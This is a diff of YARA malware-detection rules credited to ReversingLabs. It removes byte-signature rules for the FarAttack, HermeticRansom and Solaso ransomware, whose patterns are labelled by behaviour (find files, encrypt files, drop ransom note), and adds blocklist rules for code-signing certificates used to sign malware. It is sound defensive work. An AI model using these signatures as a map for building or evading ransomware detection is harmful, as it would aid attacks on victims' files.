-            8B 1D ?? ?? ?? ?? B0 ?? 88 44 24 ?? 88 44 24 ?? B0 ?? 83 C4 ?? C6 44 24 ?? ?? C7 44
-            24 ?? ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? 66 C7 44 24 ?? ?? ?? C7 44 24 ?? ?? ?? ??
-            ?? 88 44 24 ?? C7 44 24 ?? ?? ?? ?? ?? 66 C7 44 24 ?? ?? ?? C6 44 24 ?? ?? 88 44 24
-            ?? 88 44 24 ?? BE ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? 8B FF 68 ?? ?? ?? ?? 8D 8C 24
-            ?? ?? ?? ?? 6A ?? 51 C6 84 24 ?? ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? 56 8D 54 24 ??
-            52 8D 84 24 ?? ?? ?? ?? 68 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 6A ?? 8D 4C 24 ?? 6A ?? 51
-            E8 ?? ?? ?? ?? 83 C4 ?? 33 C0 33 D2 89 44 24 ?? 89 44 24 ?? 89 44 24 ?? 89 44 24 ??
-            8D 44 24 ?? 50 8D 4C 24 ?? 51 52 52 52 52 52 52 66 89 54 24 ?? 8D 94 24 ?? ?? ?? ??
-            52 6A ?? C7 44 24 ?? ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? FF D3 6A ?? FF D7 83 C6 ??
-            FF 4C 24 ?? 0F 85 ?? ?? ?? ?? BE ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? EB ?? 8D 49 ??
-            68 ?? ?? ?? ?? 8D 84 24 ?? ?? ?? ?? 6A ?? 50 C6 84 24 ?? ?? ?? ?? ?? E8
-        }
-		$find_MS_xchange_backups_p2 = {
-            83 C4 ?? 56 8D 4C 24 ?? 51 8D 94 24 ?? ?? ?? ?? 68 ?? ?? ?? ?? 52 E8 ?? ?? ?? ?? 6A
-            ?? 8D 44 24 ?? 6A ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 33 C0 33 C9 8D 54 24 ?? 52 89 44 24
-            ?? 89 44 24 ?? 89 44 24 ?? 89 44 24 ?? 8D 44 24 ?? 50 51 51 51 51 51 51 66 89 4C 24
-            ?? 8D 8C 24 ?? ?? ?? ?? 51 6A ?? C7 44 24 ?? ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? FF
-            D3 6A ?? FF D7 83 C6 ?? FF 4C 24 ?? 0F 85 ?? ?? ?? ?? 33 D2 68 ?? ?? ?? ?? 52 8D 84
-            24 ?? ?? ?? ?? 50 66 89 94 24 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? 68 ?? ?? ?? ?? 68
-            ?? ?? ?? ?? 8D 94 24 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? 33 C0 B1 ?? EB ?? 8D 49 ??
-            30 88 ?? ?? ?? ?? 40 3D ?? ?? ?? ?? 72 ?? 68 ?? ?? ?? ?? 8D 8C 24 ?? ?? ?? ?? 6A ??
-            51 C6 84 24 ?? ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? 68 ?? ?? ?? ?? 8D 94 24 ?? ?? ??
-            ?? 52 8D 84 24 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 8D 8C 24 ?? ?? ?? ?? 68 ?? ??
-            ?? ?? 51 E8 ?? ?? ?? ?? 8B F0 83 C4 ?? 85 F6 74 ?? 56 68 ?? ?? ?? ?? 6A ?? 68 ?? ??
-            ?? ?? E8 ?? ?? ?? ?? 56 E8 ?? ?? ?? ?? 83 C4 ?? 6A ?? 8D 54 24 ?? 6A ?? 52 E8 ?? ??
-            ?? ?? 83 C4 ?? 33 C0 8D 4C 24 ?? 51 8D 54 24 ?? 52 50 50 50 50 50 50 89 44 24 ?? 89
-            44 24 ?? 89 44 24 ?? 89 44 24 ?? 66 89 44 24 ?? 8D 84 24 ?? ?? ?? ?? 50 6A ?? C7 44
-            24 ?? ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? FF D3 8B 8C 24 ?? ?? ?? ?? 5F 5E 5B 33 CC
-            E8 ?? ?? ?? ?? 8B E5 5D C3
-        }
-
 	condition:
-		uint16( 0 ) == 0x5A4D and ( all of ( $find_files_p* ) ) and ( all of ( $encrypt_files_p* ) ) and ( all of ( $find_MS_xchange_backups_p* ) )
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "TRANS LTD" and ( pe.signatures [ i ] . serial == "00:e6:1b:03:66:d9:40:89:64:30:bc:fe:3e:93:ba:ac:5b" or pe.signatures [ i ] . serial == "e6:1b:03:66:d9:40:89:64:30:bc:fe:3e:93:ba:ac:5b" ) and 1528156800 <= pe.signatures [ i ] . not_after )
 }
-rule REVERSINGLABS_Win32_Ransomware_Farattack : TC_DETECTION MALICIOUS MALWARE FILE
+
+rule REVERSINGLABS_Cert_Blocklist_6294B8Acc35Dea7D32A95Ac5D4536F8F : INFO FILE
 {
 	meta:
-		description = "Yara rule that detects FarAttack ransomware."
+		description = "Certificate used for digitally signing malware."
 		author = "ReversingLabs"
-		id = "7ee7121a-4ca2-513c-96dc-53b5c48d719f"
-		date = "2022-06-21"
-		modified = "2022-06-21"
+		id = "bc380123-20fc-55de-ad1c-4f13ac173cc9"
+		date = "2020-08-05"
+		modified = "2023-11-08"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/ransomware/Win32.Ransomware.FarAttack.yara#L1-L93"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L15078-L15094"
 		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/LICENSE"
-		logic_hash = "af22b8110c2b545f083b443c7a1fa7e7639324e9188eefadfe1fe70ebb1bb7fb"
+		logic_hash = "ac92ff8e533121071a620ca5280ae66629576f9c4af9831ddac5bb487e4348af"
 		score = 75
 		quality = 90
-		tags = "TC_DETECTION, MALICIOUS, MALWARE, FILE"
+		tags = "INFO, FILE"
 		status = "RELEASED"
 		sharing = "TLP:WHITE"
-		category = "MALWARE"
-		tc_detection_type = "Ransomware"
-		tc_detection_name = "FarAttack"
-		tc_detection_factor = 5
+		category = "INFO"
 		importance = 25
 
-	strings:
-		$find_files = {
-            56 FF 73 ?? FF 15 ?? ?? ?? ?? 89 45 ?? 83 F8 ?? 75 ?? 50 FF 15 ?? ?? ?? ?? 56 E8 ??
-            ?? ?? ?? 59 6A ?? 58 E9 ?? ?? ?? ?? 8D 46 ?? 50 FF 15 ?? ?? ?? ?? 89 45 ?? 03 C7 89
-            45 ?? 3D ?? ?? ?? ?? 0F 8D ?? ?? ?? ?? F7 06 ?? ?? ?? ?? 0F 85 ?? ?? ?? ?? 8D 4E ??
-            51 68 ?? ?? ?? ?? 6A ?? FF 35 ?? ?? ?? ?? FF 35 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ??
-            83 F8 ?? 0F 84 ?? ?? ?? ?? F6 06 ?? 74 ?? 8B 45 ?? 8D 04 45 ?? ?? ?? ?? 50 8D 46 ??
-            50 8B 43 ?? 8D 04 78 83 C0 ?? 50 E8 ?? ?? ?? ?? 8B 0D ?? ?? ?? ?? 83 C4 ?? 8B 53 ??
-            8B 75 ?? 8B 01 53 89 44 72 ?? 66 8B 41 ?? 8B CE 66 89 44 4A ?? FF 43 ?? 83 63 ?? ??
-            E8 ?? ?? ?? ?? FF 4B ?? 83 63 ?? ?? 8B 75 ?? E9 ?? ?? ?? ?? 83 7B ?? ?? 75 ?? FF 73
-            ?? FF 73 ?? FF 73 ?? FF 73 ?? 57 FF 73 ?? E8 ?? ?? ?? ?? 83 C4 ?? 85 C0 74 ?? C7 43
-            ?? ?? ?? ?? ?? 8D 46 ?? 50 FF 15 ?? ?? ?? ?? 50 68 ?? ?? ?? ?? 6A ?? FF 35 ?? ?? ??
-            ?? FF 35 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? 83 F8 ?? 0F 84 ?? ?? ?? ?? 8B 45 ?? 8D
-            04 45 ?? ?? ?? ?? 50 8D 46 ?? 50 8B 43 ?? 8D 04 78 83 C0 ?? 50 E8 ?? ?? ?? ?? 83 C4
-            ?? 83 7E ?? ?? 75 ?? 83 7E ?? ?? 74 ?? 6A ?? E8 ?? ?? ?? ?? 8B F8 8B 45 ?? 8D 34 00
-            8D 4E ?? 51 E8 ?? ?? ?? ?? 56 89 07 FF 73 ?? 50 E8 ?? ?? ?? ?? 8B 07 33 C9 83 C4 ??
-            66 89 0C 06 8B 75 ?? 51 57 51 8B 46 ?? 89 47 ?? 8B 46 ?? 89 47 ?? 8B 45 ?? 89 47 ??
-            FF 73 ?? FF 15 ?? ?? ?? ?? 8B 7D ?? 8B 4B ?? A1 ?? ?? ?? ?? 89 44 79 ?? 66 A1 ?? ??
-            ?? ?? 66 89 44 79 ?? 56 FF 75 ?? FF 15
-        }
-		$create_key = {
-            55 8B EC 56 6A ?? E8 ?? ?? ?? ?? 8B F0 59 85 F6 75 ?? 32 C0 EB ?? A1 ?? ?? ?? ?? 53
-            33 DB 85 C0 74 ?? 53 6A ?? 53 53 56 FF D0 EB ?? 8A C3 84 C0 75 ?? FF 15 ?? ?? ?? ??
-            3D ?? ?? ?? ?? 75 ?? A1 ?? ?? ?? ?? 85 C0 74 ?? 6A ?? 6A ?? 53 53 56 FF D0 8A D8 84
-            DB 75 ?? 56 E8 ?? ?? ?? ?? 59 32 C0 EB ?? 8B 4D ?? B0 ?? 89 71 ?? 5B 5E 5D C3
-        }
-		$encrypt_files_p1 = {
-            50 68 ?? ?? ?? ?? 6A ?? 50 50 68 ?? ?? ?? ?? 57 FF 15 ?? ?? ?? ?? 8B F8 89 7D ?? 83
-            FF ?? 0F 84 ?? ?? ?? ?? 8B 45 ?? 0B 45 ?? 0F 84 ?? ?? ?? ?? 8B 45 ?? 8B 48 ?? 8B 40
-            ?? 83 C1 ?? 03 C1 8B 5D ?? 89 5D ?? 8B 4D ?? 89 4D ?? 99 03 D8 89 5D ?? 13 CA 89 4D
-            ?? 8B 55 ?? 8B 45 ?? 85 D2 7C ?? 7F ?? 3D ?? ?? ?? ?? 76 ?? 89 75 ?? EB ?? 83 65 ??
-            ?? 85 D2 7C ?? 7F ?? 3D ?? ?? ?? ?? 76 ?? 89 75 ?? EB ?? 83 65 ?? ?? C7 45 ?? ?? ??
-            ?? ?? 83 7D ?? ?? 74 ?? 6A ?? 6A ?? 52 50 E8 ?? ?? ?? ?? 6A ?? 6A ?? 59 89 4D ?? 51
-            52 50 E8 ?? ?? ?? ?? 89 45 ?? 89 55 ?? 8B 4D ?? 6A ?? 53 51 6A ?? 6A ?? 57 FF 15 ??
-            ?? ?? ?? 8B D8 89 5D ?? 85 DB 0F 84 ?? ?? ?? ?? 83 FB ?? 0F 84 ?? ?? ?? ?? B8 ?? ??
-            ?? ?? 89 45 ?? 89 45 ?? 33 C9 8B C1 89 45 ?? 89 45 ?? 89 4D ?? 89 4D ?? 89 45 ?? 89
-            45 ?? 89 4D ?? 8B 4D ?? FF 71 ?? 6A ?? 8D 85 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 83 C4 ??
-            84 C0 0F 85 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 50 8D 85 ?? ?? ?? ?? 50 E8
-            ?? ?? ?? ?? 83 C4 ?? 85 C0 0F 85 ?? ?? ?? ?? 8B 4D ?? FF 71 ?? FF 71 ?? 8D 41 ?? 50
-            FF 71 ?? 6A ?? 8D 85 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 8B 45 ?? 8B 55 ?? 85 C0
-        }
-		$encrypt_files_p2 = {
-            75 ?? 89 55 ?? 21 45 ?? 8B CE 89 4D ?? 89 4D ?? EB ?? 8B 4D ?? 3B 4D ?? 0F 8D ?? ??
-            ?? ?? 85 C0 0F 84 ?? ?? ?? ?? 85 C9 74 ?? 83 7D ?? ?? 74 ?? 8D 41 ?? 3B 45 ?? 74 ??
-            8B C1 99 FF 75 ?? FF 75 ?? 52 50 E8 ?? ?? ?? ?? 8B C8 89 45 ?? C7 45 ?? ?? ?? ?? ??
-            EB ?? 8B CA 81 E9 ?? ?? ?? ?? 89 4D ?? 8B 55 ?? 83 DA ?? 83 65 ?? ?? 89 55 ?? 6A ??
-            8B 45 ?? FF 70 ?? 52 51 E8 ?? ?? ?? ?? 6A ?? 8B 4D ?? FF 71 ?? 52 50 E8 ?? ?? ?? ??
-            8B C8 89 4D ?? 89 55 ?? 8B 45 ?? 2B C1 89 45 ?? 8B 4D ?? 1B CA 89 45 ?? 89 4D ?? EB
-            ?? 8B 55 ?? 8B C2 C1 F8 ?? FF 75 ?? FF 75 ?? 52 68 ?? ?? ?? ?? 53 FF 15 ?? ?? ?? ??
-            89 45 ?? 85 C0 75 ?? 50 FF 75 ?? FF 75 ?? 57 E8 ?? ?? ?? ?? 83 C4 ?? 57 FF 15 ?? ??
-            ?? ?? 8B 75 ?? 8B 7D ?? 83 4D ?? ?? E8 ?? ?? ?? ?? FF 75 ?? FF 15 ?? ?? ?? ?? 8B 45
-            ?? E8 ?? ?? ?? ?? C3 03 45 ?? 56 6A ?? 8D 4D ?? 51 50 FF 75 ?? 50 6A ?? 6A ?? 8D 85
-            ?? ?? ?? ?? 50 8D 85 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 85 C0 75 ?? 8B 45 ?? 40
-            89 45 ?? 3B 45 ?? 75 ?? 8B 75 ?? FF 76 ?? FF 76 ?? 8B 45 ?? 03 45 ?? 03 45 ?? 50 E8
-            ?? ?? ?? ?? FF 76 ?? FF 76 ?? 8B 46 ?? 03 45 ?? 03 45 ?? 03 45 ?? 50 E8 ?? ?? ?? ??
-            83 C4 ?? 8B 7E ?? 03 7E ?? 03 7D ?? 03 7D ?? 8B 45 ?? 03 F8 8D 75 ?? A5 A5 A5 A5 6A
-            ?? 50 FF 15 ?? ?? ?? ?? 8B 7D ?? 33 F6 46 FF 75 ?? FF 15 ?? ?? ?? ?? 8B 4D ?? 89 4D
-            ?? 8B 55 ?? 8B 45 ?? E9 ?? ?? ?? ?? 53 8B 35 ?? ?? ?? ?? FF D6
-        }
-
 	condition:
-		uint16( 0 ) == 0x5A4D and ( $find_files ) and ( $create_key ) and ( all of ( $encrypt_files_p* ) )
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "\\xE9\\x87\\x8D\\xE5\\xBA\\x86\\xE6\\x8E\\xA2\\xE9\\x95\\xBF\\xE7\\xBD\\x91\\xE7\\xBB\\x9C\\xE7\\xA7\\x91\\xE6\\x8A\\x80\\xE6\\x9C\\x89\\xE9\\x99\\x90\\xE5\\x85\\xAC\\xE5\\x8F\\xB8" and pe.signatures [ i ] . serial == "62:94:b8:ac:c3:5d:ea:7d:32:a9:5a:c5:d4:53:6f:8f" and 1517443200 <= pe.signatures [ i ] . not_after )
 }
-rule REVERSINGLABS_Win64_Ransomware_Hermeticransom : TC_DETECTION MALICIOUS MALWARE FILE
+
+rule REVERSINGLABS_Cert_Blocklist_485E4626C32493C16283Cfd9E30D17Ad : INFO FILE
 {
 	meta:
-		description = "Yara rule that detects HermeticRansom ransomware."
+		description = "Certificate used for digitally signing malware."
 		author = "ReversingLabs"
-		id = "6aaf89f4-0cf8-5f0e-b89d-01ac7edd06c0"
-		date = "2022-05-13"
-		modified = "2022-05-13"
+		id = "7e6834e5-ce32-5ba6-82cf-99d7b90fb4f0"
+		date = "2020-08-05"
+		modified = "2023-11-08"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/ransomware/Win64.Ransomware.HermeticRansom.yara#L1-L105"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L15096-L15112"
 		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/LICENSE"
-		logic_hash = "123d569a9d9b9d855b3baafd6194f102d82a594fd7a2bba073843a8654a317cb"
+		logic_hash = "faf860786e8473493d24abf6e61cf0b906e98d786516be6d2098181368214020"
 		score = 75
 		quality = 90
-		tags = "TC_DETECTION, MALICIOUS, MALWARE, FILE"
+		tags = "INFO, FILE"
 		status = "RELEASED"
 		sharing = "TLP:WHITE"
-		category = "MALWARE"
-		tc_detection_type = "Ransomware"
-		tc_detection_name = "HermeticRansom"
-		tc_detection_factor = 5
+		category = "INFO"
 		importance = 25
 
-	strings:
-		$drop_ransom_note = {
-            65 48 8B 0C 25 ?? ?? ?? ?? 48 8B 89 ?? ?? ?? ?? 48 8D 84 24 ?? ?? ?? ?? 48 3B 41 ??
-            0F 86 ?? ?? ?? ?? 48 81 EC ?? ?? ?? ?? 48 89 AC 24 ?? ?? ?? ?? 48 8D AC 24 ?? ?? ??
-            ?? E8 ?? ?? ?? ?? 0F 10 04 24 0F 11 44 24 ?? 0F 10 44 24 ?? 0F 11 44 24 ?? 0F 10 44
-            24 ?? 0F 11 04 24 E8 ?? ?? ?? ?? 48 8B 44 24 ?? 48 8B 4C 24 ?? 48 8D BC 24 ?? ?? ??
-            ?? 48 8D 35 ?? ?? ?? ?? 48 89 6C 24 ?? 48 8D 6C 24 ?? E8 ?? ?? ?? ?? 48 8B 6D ?? 48
-            89 8C 24 ?? ?? ?? ?? 48 89 84 24 ?? ?? ?? ?? 48 8B 05 ?? ?? ?? ?? 48 8B 0D ?? ?? ??
-            ?? 48 89 8C 24 ?? ?? ?? ?? 48 89 84 24 ?? ?? ?? ?? 48 8B 05 ?? ?? ?? ?? 48 8B 0D ??
-            ?? ?? ?? 48 89 84 24 ?? ?? ?? ?? 48 89 8C 24 ?? ?? ?? ?? 48 C7 04 24 ?? ?? ?? ?? 48
-            8D 84 24 ?? ?? ?? ?? 48 89 44 24 ?? 48 C7 44 24 ?? ?? ?? ?? ?? 48 C7 44 24 ?? ?? ??
-            ?? ?? E8 ?? ?? ?? ?? 48 8B 44 24 ?? 48 89 44 24 ?? 48 8B 4C 24 ?? 48 89 8C 24 ?? ??
-            ?? ?? 48 8D 15 ?? ?? ?? ?? 48 89 14 24 48 C7 44 24 ?? ?? ?? ?? ?? E8 ?? ?? ?? ?? 48
-            8B 44 24 ?? 48 8B 4C 24 ?? 48 8D 94 24 ?? ?? ?? ?? 48 89 14 24 48 89 4C 24 ?? 48 89
-            44 24 ?? 48 8D 05 ?? ?? ?? ?? 48 89 44 24 ?? 48 C7 44 24 ?? ?? ?? ?? ?? E8 ?? ?? ??
-            ?? 48 8B 44 24 ?? 48 8B 4C 24 ?? 48 C7 04 24 ?? ?? ?? ?? 48 89 44 24 ?? 48 89 4C 24
-            ?? 48 8D 05 ?? ?? ?? ?? 48 89 44 24 ?? 48 C7 44 24 ?? ?? ?? ?? ?? E8 ?? ?? ?? ?? 48
-            8B 44 24 ?? 48 8B 4C 24 ?? 48 89 0C 24 48 89 44 24 ?? 48 C7 44 24 ?? ?? ?? ?? ?? C7
-            44 24 ?? ?? ?? ?? ?? E8 ?? ?? ?? ?? 48 8B 44 24 ?? 48 89 84 24 ?? ?? ?? ?? 48 8B 4C
-            24 ?? 48 89 8C 24 ?? ?? ?? ?? 48 89 44 24 ?? C7 04 24 ?? ?? ?? ?? 48 8D 15 ?? ?? ??
-            ?? 48 89 54 24 ?? E8 ?? ?? ?? ?? 85 C0 0F 85 ?? ?? ?? ?? 48 8B 84 24 ?? ?? ?? ?? 48
-        }
-		$encrypt_files_p1 = {
-            E8 ?? ?? ?? ?? 48 8B 44 24 ?? 48 89 84 24 ?? ?? ?? ?? 48 8B 4C 24 ?? 48 89 8C 24 ??
-            ?? ?? ?? 48 8B 15 ?? ?? ?? ?? 48 8B 1D ?? ?? ?? ?? 48 8B 35 ?? ?? ?? ?? 48 89 14 24
-            48 89 74 24 ?? 48 89 5C 24 ?? 48 8D 15 ?? ?? ?? ?? 48 89 54 24 ?? 48 C7 44 24 ?? ??
-            ?? ?? ?? 48 8B 15 ?? ?? ?? ?? 48 8B 1D ?? ?? ?? ?? 48 89 5C 24 ?? 48 89 54 24 ?? E8
-            ?? ?? ?? ?? 48 8B 44 24 ?? 48 8B 4C 24 ?? 48 8B 54 24 ?? 48 8B 9C 24 ?? ?? ?? ?? 48
-            85 DB 0F 85 ?? ?? ?? ?? 48 89 44 24 ?? 48 89 4C 24 ?? 48 89 94 24 ?? ?? ?? ?? 48 8D
-            05 ?? ?? ?? ?? 48 89 04 24 48 C7 44 24 ?? ?? ?? ?? ?? 48 C7 44 24 ?? ?? ?? ?? ?? E8
-            ?? ?? ?? ?? 48 8D 05 ?? ?? ?? ?? 48 89 04 24 48 8B 44 24 ?? 48 89 C1 48 C1 F8 ?? 48
-            C1 E8 ?? 48 01 C8 48 C1 F8 ?? 48 89 84 24 ?? ?? ?? ?? 48 C1 E0 ?? 48 29 C1 48 89 4C
-            24 ?? 48 89 4C 24 ?? E8 ?? ?? ?? ?? 48 8B 84 24 ?? ?? ?? ?? 48 89 04 24 0F 57 C0 0F
-            11 44 24 ?? E8 ?? ?? ?? ?? 48 8B 84 24 ?? ?? ?? ?? 48 83 F8 ?? 7E ?? B8 ?? ?? ?? ??
-            48 89 84 24 ?? ?? ?? ?? 31 C9 EB ?? 48 8B 84 24 ?? ?? ?? ?? 48 8B 8C 24 ?? ?? ?? ??
-            48 39 C1 0F 8D ?? ?? ?? ?? 48 89 CA 48 C1 E1 ?? 48 FF C2 48 89 D3 48 C1 E2 ?? 48 39
-            D1 0F 87 ?? ?? ?? ?? 48 8B 74 24 ?? 48 39 F2 0F 87 ?? ?? ?? ?? 48 89 9C 24 ?? ?? ??
-            ?? 48 8B 05 ?? ?? ?? ?? 48 8B 1D ?? ?? ?? ?? 48 8B 3D ?? ?? ?? ?? 48 89 3C 24 48 89
-        }
-		$encrypt_files_p2 = {
-            5C 24 ?? 48 89 44 24 ?? 48 29 CE 48 89 F3 48 F7 DE 48 C1 FE ?? 48 21 CE 48 8B BC 24
-            ?? ?? ?? ?? 48 01 FE 48 89 74 24 ?? 48 29 CA 48 89 54 24 ?? 48 89 5C 24 ?? E8 ?? ??
-            ?? ?? 48 8B 44 24 ?? 48 8B 4C 24 ?? 48 8B 54 24 ?? 48 8B 5C 24 ?? 48 85 DB 0F 85 ??
-            ?? ?? ?? 48 8B 9C 24 ?? ?? ?? ?? 48 89 1C 24 48 89 44 24 ?? 48 89 4C 24 ?? 48 89 54
-            24 ?? E8 ?? ?? ?? ?? E9 ?? ?? ?? ?? 48 83 F8 ?? 0F 8D ?? ?? ?? ?? 48 C1 E0 ?? 48 8B
-            4C 24 ?? 48 39 C8 0F 87 ?? ?? ?? ?? 48 8B 15 ?? ?? ?? ?? 48 8B 1D ?? ?? ?? ?? 48 8B
-            35 ?? ?? ?? ?? 48 89 14 24 48 89 5C 24 ?? 48 89 74 24 ?? 48 8B 54 24 ?? 48 29 C2 48
-            89 D3 48 F7 DA 48 C1 FA ?? 48 21 C2 48 8B B4 24 ?? ?? ?? ?? 48 01 F2 48 89 54 24 ??
-            48 29 C1 48 89 4C 24 ?? 48 89 5C 24 ?? E8 ?? ?? ?? ?? 48 8B 44 24 ?? 48 8B 4C 24 ??
-            48 8B 54 24 ?? 48 8B 5C 24 ?? 48 85 DB 74 ?? 48 8B 84 24 ?? ?? ?? ?? 48 8B 8C 24 ??
-            ?? ?? ?? 48 89 8C 24 ?? ?? ?? ?? 48 89 84 24 ?? ?? ?? ?? 48 8B AC 24 ?? ?? ?? ?? 48
-            81 C4 ?? ?? ?? ?? C3 48 8B 9C 24 ?? ?? ?? ?? 48 89 1C 24 48 89 44 24 ?? 48 89 4C 24
-            ?? 48 89 54 24 ?? E8 ?? ?? ?? ?? 48 8B 84 24
-        }
-		$find_files = {
-            65 48 8B 0C 25 ?? ?? ?? ?? 48 8B 89 ?? ?? ?? ?? 48 3B 61 ?? 0F 86 ?? ?? ?? ?? 48 83
-            EC ?? 48 89 6C 24 ?? 48 8D 6C 24 ?? 48 C7 04 24 ?? ?? ?? ?? 48 8B 84 24 ?? ?? ?? ??
-            48 89 44 24 ?? 48 8B 8C 24 ?? ?? ?? ?? 48 89 4C 24 ?? 48 8D 15 ?? ?? ?? ?? 48 89 54
-            24 ?? 48 C7 44 24 ?? ?? ?? ?? ?? 48 8B 15 ?? ?? ?? ?? 48 8B 1D ?? ?? ?? ?? 48 89 54
-            24 ?? 48 89 5C 24 ?? 48 8D 15 ?? ?? ?? ?? 48 89 54 24 ?? 48 C7 44 24 ?? ?? ?? ?? ??
-            E8 ?? ?? ?? ?? 48 8B 44 24 ?? 48 89 44 24 ?? 48 8B 4C 24 ?? 48 89 4C 24 ?? 48 8B 94
-            24 ?? ?? ?? ?? 48 89 14 24 48 8B 9C 24 ?? ?? ?? ?? 48 89 5C 24 ?? 48 89 44 24 ?? 48
-            89 4C 24 ?? E8 ?? ?? ?? ?? 48 8B 44 24 ?? 48 85 C0 0F 84 ?? ?? ?? ?? 48 8B 84 24 ??
-            ?? ?? ?? 48 8B 8C 24 ?? ?? ?? ?? 48 89 04 24 48 89 4C 24 ?? 48 C7 44 24 ?? ?? ?? ??
-            ?? C7 44 24 ?? ?? ?? ?? ?? E8 ?? ?? ?? ?? 48 8B 44 24 ?? 48 8B 4C 24 ?? 48 85 C9 75
-            ?? 48 89 44 24 ?? 48 89 04 24 E8 ?? ?? ?? ?? 48 8B 44 24 ?? 48 85 C0 74 ?? 48 8B 44
-            24 ?? 48 89 04 24 E8 ?? ?? ?? ?? C6 84 24 ?? ?? ?? ?? ?? 48 8B 6C 24 ?? 48 83 C4 ??
-            C3 48 8B 44 24 ?? 48 89 04 24 E8 ?? ?? ?? ?? C6 84 24 ?? ?? ?? ?? ?? 48 8B 6C 24 ??
-            48 83 C4 ?? C3 48 89 04 24 E8 ?? ?? ?? ?? C6 84 24 ?? ?? ?? ?? ?? 48 8B 6C 24 ?? 48
-            83 C4 ?? C3 48 8B 44 24
-        }
+	condition:
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Yu Bao" and pe.signatures [ i ] . serial == "48:5e:46:26:c3:24:93:c1:62:83:cf:d9:e3:0d:17:ad" and 1473292800 <= pe.signatures [ i ] . not_after )
+}
+
+rule REVERSINGLABS_Cert_Blocklist_D0312F9177Cd46B943Df3Ef22Db4608B : INFO FILE
+{
+	meta:
+		description = "Certificate used for digitally signing malware."
+		author = "ReversingLabs"
+		id = "b36ba3c9-4a64-505a-ae27-ec8ee969dc29"
+		date = "2020-08-05"
+		modified = "2023-11-08"
+		reference = "ReversingLabs"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L15114-L15132"
+		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/LICENSE"
+		logic_hash = "2eb955e91c927980cee031c6284e48bad315e891c32cdaf41b844090e841c44d"
+		score = 75
+		quality = 90
+		tags = "INFO, FILE"
+		status = "RELEASED"
+		sharing = "TLP:WHITE"
+		category = "INFO"
+		importance = 25
 
 	condition:
-		uint16( 0 ) == 0x5A4D and ( $find_files ) and ( all of ( $encrypt_files_p* ) ) and ( $drop_ransom_note )
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "United Systems Technology, Inc." and ( pe.signatures [ i ] . serial == "00:d0:31:2f:91:77:cd:46:b9:43:df:3e:f2:2d:b4:60:8b" or pe.signatures [ i ] . serial == "d0:31:2f:91:77:cd:46:b9:43:df:3e:f2:2d:b4:60:8b" ) and 1341273600 <= pe.signatures [ i ] . not_after )
 }
-rule REVERSINGLABS_Win64_Ransomware_Solaso : TC_DETECTION MALICIOUS MALWARE FILE
+
+rule REVERSINGLABS_Cert_Blocklist_202702 : INFO FILE
 {
 	meta:
-		description = "Yara rule that detects Solaso ransomware."
+		description = "Certificate used for digitally signing malware."
 		author = "ReversingLabs"
-		id = "53f56ad8-ccdf-58f0-a5d9-e58f2c18ac76"
-		date = "2021-11-02"
-		modified = "2021-11-02"
+		id = "befb8867-37d6-5b0a-9801-c069b92f8edc"
+		date = "2020-08-05"
+		modified = "2023-11-08"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/ransomware/Win64.Ransomware.Solaso.yara#L1-L171"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L15134-L15150"
 		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/LICENSE"
-		logic_hash = "368a80a9f2e264d17c61d6ed4c22baec838ba0b0bc2e5c79344830bf861aa5a2"
+		logic_hash = "bc097e97c1c4c4a71cbf66be811636fecfa23682cb2cc47ab1fcd680a646fb14"
 		score = 75
 		quality = 90
